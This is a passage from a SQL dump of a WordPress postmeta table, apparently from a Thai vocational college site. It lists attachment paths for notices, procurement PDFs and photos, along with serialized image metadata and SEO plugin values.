(10104, 4617, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1109;s:6:\"height\";i:345;s:4:\"file\";s:31:\"2018/11/16-11-2561-15-30-44.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"16-11-2561-15-30-44-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"16-11-2561-15-30-44-300x93.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"16-11-2561-15-30-44-768x239.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:239;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"16-11-2561-15-30-44-1024x319.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:319;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"16-11-2561-15-30-44-400x124.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:124;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10105, 4619, '_edit_lock', '1542608169:3'),
(10106, 4619, '_edit_last', '3'),
(10109, 4622, '_wp_attached_file', '2018/11/ประกาศ-ประชาพิจารณ์-ประจำปีงบประมาณ2562.pdf'),
(10110, 4623, '_wp_attached_file', '2018/11/ชุดทดลองและเครื่องมือวิเคราะห์ไฟฟ้าและอิเล็กทรอนิกส์ยานยนต์-3.pdf'),
(10111, 4624, '_wp_attached_file', '2018/11/ชุดฝึกอิเล็กทรอนิกส์อัจฉริยะ-2.pdf'),
(10112, 4625, '_wp_attached_file', '2018/11/ชุดฝึกหุ่นยนต์อุตสาหกรรม-2.pdf'),
(10116, 4619, '_hide_featured', NULL),
(10117, 4619, '_yoast_wpseo_content_score', '90'),
(10118, 4619, '_yoast_wpseo_primary_category', '3'),
(10119, 4619, '_wpas_done_all', '1'),
(10120, 4619, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1574861238;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4017;}i:1;a:1:{s:2:\"id\";i:5091;}i:2;a:1:{s:2:\"id\";i:6063;}}}}'),
(10123, 4629, '_edit_lock', '1542696399:3'),
(10124, 4629, '_edit_last', '3'),
(10125, 4630, '_wp_attached_file', '2018/11/46049465_706795259696665_1553755851561369600_o.jpg'),
(10126, 4630, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2018/11/46049465_706795259696665_1553755851561369600_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"46049465_706795259696665_1553755851561369600_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"46049465_706795259696665_1553755851561369600_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"46049465_706795259696665_1553755851561369600_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"46049465_706795259696665_1553755851561369600_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"46049465_706795259696665_1553755851561369600_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10127, 4629, '_thumbnail_id', '4630'),
(10131, 4629, '_hide_featured', NULL),
(10132, 4629, '_yoast_wpseo_content_score', '30'),
(10133, 4629, '_yoast_wpseo_primary_category', '31'),
(10134, 4629, '_wpas_done_all', '1'),
(10135, 4632, '_edit_lock', '1542696894:3'),
(10136, 4632, '_edit_last', '3'),
(10137, 4633, '_wp_attached_file', '2018/11/46095544_2045322895487904_8714218356997095424_n.jpg'),
(10138, 4633, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:59:\"2018/11/46095544_2045322895487904_8714218356997095424_n.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"46095544_2045322895487904_8714218356997095424_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"46095544_2045322895487904_8714218356997095424_n-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"46095544_2045322895487904_8714218356997095424_n-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:59:\"46095544_2045322895487904_8714218356997095424_n-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10139, 4632, '_thumbnail_id', '4633'),
(10143, 4632, '_hide_featured', NULL),
(10144, 4632, '_yoast_wpseo_content_score', '30'),
(10145, 4632, '_yoast_wpseo_primary_category', '31'),
(10146, 4632, '_wpas_done_all', '1'),
(10147, 4635, '_edit_lock', '1542700526:3'),
(10148, 4635, '_edit_last', '3'),
(10149, 4636, '_wp_attached_file', '2018/11/46436371_2051789371507923_8973501010056052736_n.jpg'),
(10150, 4636, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:59:\"2018/11/46436371_2051789371507923_8973501010056052736_n.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"46436371_2051789371507923_8973501010056052736_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"46436371_2051789371507923_8973501010056052736_n-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"46436371_2051789371507923_8973501010056052736_n-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:59:\"46436371_2051789371507923_8973501010056052736_n-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10151, 4635, '_thumbnail_id', '4636'),
(10155, 4635, '_hide_featured', NULL),
(10156, 4635, '_yoast_wpseo_content_score', '30'),
(10157, 4635, '_yoast_wpseo_primary_category', '31'),
(10158, 4635, '_wpas_done_all', '1'),
(10159, 4635, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575107948;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4704;}i:1;a:1:{s:2:\"id\";i:4023;}i:2;a:1:{s:2:\"id\";i:4701;}}}}'),
(10160, 4638, '_edit_lock', '1542701322:3'),
(10161, 4638, '_edit_last', '3'),
(10162, 4639, '_wp_attached_file', '2018/11/46488546_710232106019647_4807326030777810944_o.jpg'),
(10163, 4639, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1187;s:6:\"height\";i:890;s:4:\"file\";s:58:\"2018/11/46488546_710232106019647_4807326030777810944_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"46488546_710232106019647_4807326030777810944_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"46488546_710232106019647_4807326030777810944_o-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"46488546_710232106019647_4807326030777810944_o-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"46488546_710232106019647_4807326030777810944_o-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"46488546_710232106019647_4807326030777810944_o-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10164, 4638, '_thumbnail_id', '4639'),
(10168, 4638, '_hide_featured', NULL),
(10169, 4638, '_yoast_wpseo_content_score', '30'),
(10170, 4638, '_yoast_wpseo_primary_category', '31'),
(10171, 4638, '_wpas_done_all', '1'),
(10172, 4638, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575707300;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4708;}i:1;a:1:{s:2:\"id\";i:4869;}i:2;a:1:{s:2:\"id\";i:5582;}}}}'),
(10173, 4629, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575521096;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4881;}i:1;a:1:{s:2:\"id\";i:4182;}i:2;a:1:{s:2:\"id\";i:4887;}}}}'),
(10174, 4632, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575361449;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4704;}i:1;a:1:{s:2:\"id\";i:4986;}i:2;a:1:{s:2:\"id\";i:4875;}}}}'),
(10175, 4641, '_edit_lock', '1542767315:3'),
(10176, 4641, '_edit_last', '3'),
(10177, 4642, '_wp_attached_file', '2018/11/เผยแพร่แผนการจัดซื้อจัดจ้าง-62.pdf'),
(10181, 4641, '_hide_featured', NULL),
(10182, 4641, '_yoast_wpseo_content_score', '60'),
(10183, 4641, '_yoast_wpseo_primary_category', '3'),
(10184, 4641, '_wpas_done_all', '1'),
(10185, 4641, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575222672;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4907;}i:1;a:1:{s:2:\"id\";i:4154;}i:2;a:1:{s:2:\"id\";i:4975;}}}}'),
(10186, 4645, '_wp_attached_file', '2018/11/21-11-2561-10-01-27.jpg'),
(10187, 4645, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:563;s:6:\"height\";i:358;s:4:\"file\";s:31:\"2018/11/21-11-2561-10-01-27.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"21-11-2561-10-01-27-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"21-11-2561-10-01-27-300x191.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"21-11-2561-10-01-27-400x254.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:254;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10188, 1572, '_yoast_wpseo_content_score', '30'),
(10189, 4647, '_wp_attached_file', '2018/11/21-11-2561-10-13-17.jpg'),
(10190, 4647, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:713;s:6:\"height\";i:620;s:4:\"file\";s:31:\"2018/11/21-11-2561-10-13-17.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"21-11-2561-10-13-17-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"21-11-2561-10-13-17-300x261.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"21-11-2561-10-13-17-345x300.jpg\";s:5:\"width\";i:345;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10191, 1576, '_yoast_wpseo_content_score', '90'),
(10192, 4651, '_edit_lock', '1542854426:3'),
(10193, 4651, '_edit_last', '3'),
(10194, 4652, '_wp_attached_file', '2018/11/นักเรียน-นักศึกษา-พ้นสภาพ-2-2561.pdf'),
(10198, 4651, '_hide_featured', NULL),
(10199, 4651, '_yoast_wpseo_content_score', '60'),
(10200, 4651, '_yoast_wpseo_primary_category', '3'),
(10201, 4651, '_wpas_done_all', '1'),
(10202, 4651, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1574985637;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5469;}i:1;a:1:{s:2:\"id\";i:4093;}i:2;a:1:{s:2:\"id\";i:4020;}}}}'),
(10203, 4654, '_edit_lock', '1543208217:3'),
(10204, 4654, '_edit_last', '3'),
(10209, 4654, '_hide_featured', NULL),
(10210, 4654, '_yoast_wpseo_content_score', '60'),
(10211, 4654, '_yoast_wpseo_primary_category', '3'),
(10212, 4654, '_wpas_done_all', '1'),
(10213, 4654, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575455628;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4692;}i:1;a:1:{s:2:\"id\";i:4063;}i:2;a:1:{s:2:\"id\";i:4057;}}}}'),
(10217, 4660, '_wp_attached_file', '2018/11/จ้างเหมาบริการยามรักษาการณ์-ประจำปีงบประมาณ-พ.ศ.2562.pdf'),
(10222, 4662, '_edit_lock', '1543375066:3'),
(10223, 4662, '_edit_last', '3'),
(10224, 4663, '_wp_attached_file', '2018/11/ตารางเวร-ธันวาคม-2561.pdf'),
(10228, 4662, '_hide_featured', NULL),
(10229, 4662, '_yoast_wpseo_content_score', '60'),
(10230, 4662, '_yoast_wpseo_primary_category', '3'),
(10231, 4662, '_wpas_done_all', '1'),
(10232, 4662, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575641777;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4172;}i:1;a:1:{s:2:\"id\";i:4006;}i:2;a:1:{s:2:\"id\";i:5361;}}}}'),
(10233, 4665, '_edit_lock', '1543377188:3');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(10234, 4665, '_edit_last', '3'),
(10235, 4666, '_wp_attached_file', '2018/11/สมัครคัดเลือก-ครูอัตราจ้าง-5-อัตรา.pdf'),
(10239, 4665, '_hide_featured', NULL),
(10240, 4665, '_yoast_wpseo_content_score', '60'),
(10241, 4665, '_yoast_wpseo_primary_category', '3'),
(10242, 4665, '_wpas_done_all', '1'),
(10243, 4665, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1574996886;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5046;}i:1;a:1:{s:2:\"id\";i:4139;}i:2;a:1:{s:2:\"id\";i:5481;}}}}'),
(10244, 4668, '_edit_lock', '1543377664:3'),
(10245, 4668, '_edit_last', '3'),
(10246, 4669, '_wp_attached_file', '2018/11/นร-พ้นสภาพ-2-2561.pdf'),
(10250, 4668, '_hide_featured', NULL),
(10251, 4668, '_yoast_wpseo_content_score', '60'),
(10252, 4668, '_yoast_wpseo_primary_category', '3'),
(10253, 4668, '_wpas_done_all', '1'),
(10254, 4668, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575374056;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5469;}i:1;a:1:{s:2:\"id\";i:4093;}i:2;a:1:{s:2:\"id\";i:4020;}}}}'),
(10255, 4672, '_edit_lock', '1543454590:3'),
(10256, 4672, '_edit_last', '3'),
(10257, 4673, '_wp_attached_file', '2018/11/ประกวดราคา-ชุดฝึกหุ่นยนต์-1-ชุด.pdf'),
(10261, 4672, '_hide_featured', NULL),
(10262, 4672, '_yoast_wpseo_content_score', '60'),
(10263, 4672, '_yoast_wpseo_primary_category', '3'),
(10264, 4672, '_wpas_done_all', '1'),
(10265, 4675, '_edit_lock', '1543454850:3'),
(10266, 4675, '_edit_last', '3'),
(10267, 4676, '_wp_attached_file', '2018/11/ประกวดราคา-ชุดฝึกอิเล็กทรอนิกส์-1-ชุด.pdf'),
(10271, 4675, '_hide_featured', NULL),
(10272, 4675, '_yoast_wpseo_content_score', '60'),
(10273, 4675, '_yoast_wpseo_primary_category', '3'),
(10274, 4675, '_wpas_done_all', '1'),
(10275, 4672, '_jetpack_related_posts_cache', 'a:1:{s:32:\"93b0de8c60871e7bd47f7f011f3ad534\";a:2:{s:7:\"expires\";i:1575309600;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4781;}i:1;a:1:{s:2:\"id\";i:4803;}i:2;a:1:{s:2:\"id\";i:4675;}}}}'),
(10276, 4678, '_edit_lock', '1543471265:3'),
(10277, 4678, '_edit_last', '3'),
(10279, 4680, '_wp_attached_file', '2018/11/รับสมัคร-เจ้าหน้าที่ธุรการ-1-อัตรา-1.pdf'),
(10283, 4678, '_hide_featured', NULL),
(10284, 4678, '_yoast_wpseo_content_score', '60'),
(10285, 4678, '_yoast_wpseo_primary_category', '3'),
(10286, 4678, '_wpas_done_all', '1'),
(10287, 4678, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575552406;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4139;}i:1;a:1:{s:2:\"id\";i:6008;}i:2;a:1:{s:2:\"id\";i:5906;}}}}'),
(10288, 4675, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575006343;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4781;}i:1;a:1:{s:2:\"id\";i:4803;}i:2;a:1:{s:2:\"id\";i:4672;}}}}'),
(10289, 4682, '_edit_lock', '1543480977:3'),
(10290, 4682, '_edit_last', '3'),
(10291, 4683, '_wp_attached_file', '2018/11/ประชาพิจารณ์-สาขาช่างยนต์-ครั้งที่2.pdf'),
(10295, 4682, '_hide_featured', NULL),
(10296, 4682, '_yoast_wpseo_content_score', '60'),
(10297, 4682, '_yoast_wpseo_primary_category', '3'),
(10298, 4682, '_wpas_done_all', '1'),
(10299, 4682, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575661409;s:7:\"payload\";a:0:{}}}'),
(10300, 4685, '_edit_lock', '1543810488:3'),
(10301, 4685, '_edit_last', '3'),
(10305, 4685, '_hide_featured', NULL),
(10306, 4685, '_yoast_wpseo_content_score', '30'),
(10307, 4685, '_yoast_wpseo_primary_category', '31'),
(10308, 4685, '_wpas_done_all', '1'),
(10309, 4687, '_edit_lock', '1543804614:3'),
(10310, 4687, '_edit_last', '3'),
(10311, 4685, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575567088;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4718;}i:1;a:1:{s:2:\"id\";i:4881;}i:2;a:1:{s:2:\"id\";i:5162;}}}}'),
(10312, 4688, '_wp_attached_file', '2018/12/46472619_710819072627617_5889898084200087552_n.jpg'),
(10313, 4688, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:800;s:6:\"height\";i:600;s:4:\"file\";s:58:\"2018/12/46472619_710819072627617_5889898084200087552_n.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"46472619_710819072627617_5889898084200087552_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"46472619_710819072627617_5889898084200087552_n-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"46472619_710819072627617_5889898084200087552_n-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"46472619_710819072627617_5889898084200087552_n-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10314, 4687, '_thumbnail_id', '4688'),
(10318, 4687, '_hide_featured', NULL),
(10319, 4687, '_yoast_wpseo_content_score', '30'),
(10320, 4687, '_yoast_wpseo_primary_category', '31'),
(10321, 4687, '_wpas_done_all', '1'),
(10322, 4690, '_wp_attached_file', '2018/12/46457881_710801739296017_739959772031221760_o.jpg'),
(10323, 4690, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:57:\"2018/12/46457881_710801739296017_739959772031221760_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:57:\"46457881_710801739296017_739959772031221760_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:57:\"46457881_710801739296017_739959772031221760_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:57:\"46457881_710801739296017_739959772031221760_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:58:\"46457881_710801739296017_739959772031221760_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:57:\"46457881_710801739296017_739959772031221760_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10324, 4685, '_thumbnail_id', '4696'),
(10328, 4692, '_edit_lock', '1543809960:3'),
(10329, 4692, '_edit_last', '3'),
(10330, 4693, '_wp_attached_file', '2018/12/ยกเลิกแผนการจัดซื้อจัดจ้าง-62.pdf'),
(10334, 4692, '_hide_featured', NULL),
(10335, 4692, '_yoast_wpseo_content_score', '60'),
(10336, 4692, '_yoast_wpseo_primary_category', '3'),
(10337, 4692, '_wpas_done_all', '1'),
(10338, 4692, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1574861094;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4907;}i:1;a:1:{s:2:\"id\";i:4154;}i:2;a:1:{s:2:\"id\";i:4975;}}}}'),
(10339, 4696, '_wp_attached_file', '2018/12/46488045_711196739256517_1628095443328040960_o.jpg'),
